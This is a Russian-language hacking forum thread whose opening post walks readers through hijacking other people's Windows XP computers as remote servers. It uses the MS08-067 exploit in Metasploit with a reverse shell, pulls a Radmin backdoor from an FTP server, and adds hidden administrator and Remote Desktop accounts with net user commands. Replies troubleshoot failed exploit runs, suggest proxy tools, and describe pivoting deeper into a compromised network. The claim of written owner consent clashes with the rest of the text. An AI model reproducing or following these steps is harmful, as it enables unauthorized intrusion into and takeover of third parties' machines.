Начну с того порядком уже надоело читать как люди ищут дедик , просят их , я уже писал , что мы ходим по этим дедикам , проксям и тд и тп . Сегодня мы рассмотрим метод добычи дедика по средством Metasploit 3.2 с эксплойтом MS08-067_netapi который использует уязвимость в службе SMB на 445 порту , уязвимы все Windows XP Pro sp2 и sp3 , скачать Metasploit 3.2 можно от сюда http://www.metasploit.com/ , теперь скачаем сканер портов , я использую ip angry версии 2.21 она мне больше почему нравиться , офсайт http://www.angryziber.com/w/Download , предположим что всё это мы уже скачали и установлил , запускаем сканер портов отметив в сканере порт 445 , именно он нам очень нужен , если просканировав сеть вы не увидели наличие открытого 445 порта в этой сети делать нечего , если же такой порт имеется то это очень даже хорошо ! Затем в Метасплойт в дальшейшем МС , находим эксплойт MS08-067_netapi жмём выполнить , Выбор цели Автомат , Payloads =generic/shell_reverse_tcp в RHOST ip жертвы и жмём применить , если уязвимость существует вы получите шелл (cmd.exe) удалённого компьютера , а в окошке Sessions появиться ip жертвы Предположим что FTP сервер у нас установлен и настроен , в cmd пишем Code: C:\>ftp ftp> o К 10.xx.xx.xx Связь с 10.xx.xx.xx . 220 Welcome to 10.xx.xx.xx FTP service. Пользователь (10.xx.xx.xx :(none)): anonymous 230 Login successful. ftp> Я настроил фтп на anonymous без пароля , ну вот мы зашли на свой фтп , смотрим где что у нас лежит командой PHP: dir Видим что лежит наш уже приготовленный радмин-сервер sys.exe зальём его на комп жертвы Code: get sys.exe bye Файл залит , выходим с фтп и возвращаемся а наш шелл смотрим залит ли файл и запускаем его PHP: C:\>sys.exe Теперь запустим RadminViewer и пробуем приконектится к нашему залитому и запущенному радмин-серверу Замечательно конект есть , вбиваем наш пароль и вот мы дома Теперь в радмине выбираем режим "Передачи файлов и загружаем наш terminal.exe , который сделает нам дедик на этом компьютере , хотя можно сделать учётки и в ручную PHP: cmd net user user pass /add net localgroup Administrators user /add net localgroup "Remote Desktop Users" user /add net accounts /maxpwage:unlimited exit Далее радмином в режиме "Телнет " запустим наш terminal.exe Затем "Подключение к удаленному рабочему столу" и пробуем приконектимся к нашему свежеиспечёному дедику Как видите на скрине показанно , что если мы сейчас нажём "ДА" то админа может выкинуть из свой сессии , и он может заподозрить что то не ладное в своей системе , как правило это может , повторяют может лечиться перезагрузкой компьютера , но помогает не всегда ! 50/50 Вы спросите почему я сразу не залил terminal.exe , отвечаю буквы в шелле отображаются кракозябрами и скорость в дедике сами понимаете , так что мне важно был залить радмина , а там уже дело техники Ну вот у нас есть дедик , на нём мы может установить прокси , фпт и многое многое другое , примерно в течении часа получилось 5 дедиков , я думаю это не плохо ! ps: Всё тут написанное не претендует на статью , теперь от себя хочу сказать следующие этот метод всё равно требует времени и терпения , если кто то хочет жать на кнопку "применить в Местаслойте" и чтобы он вам выкидвал готовые деды , ИДЕТЕ ЛЕСОМ , дабы не сказать грубей ! Подробно про Метасплойт и эксплойты можно почитать тут http://www.metasploit.com/ про Terminal.exe здесь http://forum.antichat.ru/thread36042.html Ну вроде теперь думаю отпадут вопросы , как и что , ищите сети со статистическими ip и дедиков будет в огромном количестве , а данной статейке лишний раз видно как уязвимы продукты Microsoft , поэтому я уже давно в качестве севера юзаю FreeBSD , а качестве десктопа Ubuntu (Linux Mint /etc) , думаю и другим пользователям пора уже сделать выводы !! В ходе эксперимента все данные пользователя не тронуты и на данное действие было дано его письменного согласие . источник stopxaker.ru
Ето так должно или у меня чето нетак??? Установил запуснил отклылся СМД и бегут строки0_о минут так 5 уже0_о мне аж страшно))) если оно будет работать (метасплойт) выложу предложения как проще етим способом завладеть дедом) токо щас протестирую его)
Юзай консольный сокc, инфа по теме: http://vfose.hsdn.org/forum/viewtopic.php?f=8&t=266&sid=8b2e00d52d102173376fa7c19e8bfead можно заюзать 3proxy http://3proxy.ru/download/
Блин я уже жалею что запостил эту статью ну дурдом полный в аське такие вопросы задают что епанутся можно типо: список буду пополнять Люди у вы все сидите в интеренете !!! у вас под носом www.google.com по всем вопросам к нему > туда в www.google.com
нашел я тачки с портом 445 доходит до етого 23:53:58 - ms08_067_netapi [*] Triggering the vulnerability... и все((( вот приблезительно такое всегда 23:53:42 - ms08_067_netapi [*] Launching exploit windows/smb/ms08_067_netapi... 23:53:44 - ms08_067_netapi [*] Started reverse handler 23:53:46 - ms08_067_netapi [*] Automatically detecting the target... 23:53:57 - ms08_067_netapi [*] Fingerprint: Windows XP Service Pack 2 - lang:Russian 23:53:57 - ms08_067_netapi [*] Selected Target: Windows XP SP2 Russian (NX) 23:53:58 - ms08_067_netapi [*] Triggering the vulnerability... и все жду 5 мин ничего непроисходит( че делать?
а и еще выбираю generic/shell_reverse_tcp потому что generic/tcp/reverse shell ненашел( а етот похожый)
жесть парни))))в поиске всё есть. стопхакер,не качается прога по ссылке что дал лебедь (прокся там). кстати вот сдесь очень удобно смотреть диапазоны http://worldips.info/
Найди CCProxy обработай ResHackoм , и будет тебе прокся , на готовый CCPROXY вот тут в архиве soft_all.zip (радмин , terminal.exe и старый сплойт LSA )
проверил штук 20 айпи с открытым портом445 и пишет что то вроде этого "Exploit failed: The server responded with error: STATUS_OBJECT_NAME_NOT_FOUND (Command=162 WordCount=0)"
Я об этом писал , что не все подряд будут хакаться с открытым 445 портом , нужно искать , причины могут быть следующие : установлена заплатка от этой уязвимости , стоит сторонний фаерволл , установлен KIS и тд и тп ps : Я делаю так , нахожу сеть, делаю в ней дедик , а потом уже из этого деда работаю с этой сетью .